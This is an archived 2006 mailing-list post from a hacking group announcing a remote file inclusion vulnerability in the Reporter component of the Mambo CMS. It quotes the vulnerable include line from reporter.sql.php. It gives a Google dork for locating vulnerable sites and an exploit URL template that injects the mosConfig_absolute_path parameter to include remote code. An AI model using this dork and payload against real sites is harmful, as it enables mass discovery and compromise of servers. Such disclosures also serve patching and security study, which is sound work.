Reporter Mambo Component Remote File İnclude

From: <crackers_child_at_sibersavascilar.com>
Date: 16 Aug 2006 16:50:09 -0000

('binary' encoding is not supported, stored as-is) !!!!!!!!!WWW.SiBERSAVASCiLAR.COM!!!!!!!!!
--------------------------------------------------------------------------------

Title : Reporter Mambo Component Remote File Include Vulnerabilities

--------------------------------------------------------------------------------
#Author: Crackers_Child

#cont_at_ct: crackers_child_at_sibersavascilar.com

--------------------------------------------------------------------------------

Google Dorks : inurl:"/com_reporter/"

------------------------- -------------------------------------------------------

Application : reporter Component of Mambo

--------------------------------------------------------------------------------
Bug &#304;n reporter.sql.php

require_once($mosConfig_absolute_path.'/components/com_reporter/view/'.$view_class.'.view.php');
$page = new ResultView($result);

--------------------------------------------------------------------------------

Exploit:

http://[target]/[mambo_path]/components/com_reporter/processor/reporter.sql.php?mosConfig_absolute_path=

--------------------------------------------------------------------------------

greets:

All My Friends And SiberSavascilar.Com Members !

--------------------------------------------------------------------------------

--------------------------------- [ WWW.SiBERSAVASCiLAR.COM ] --------------------------------------
Received on Aug 16 2006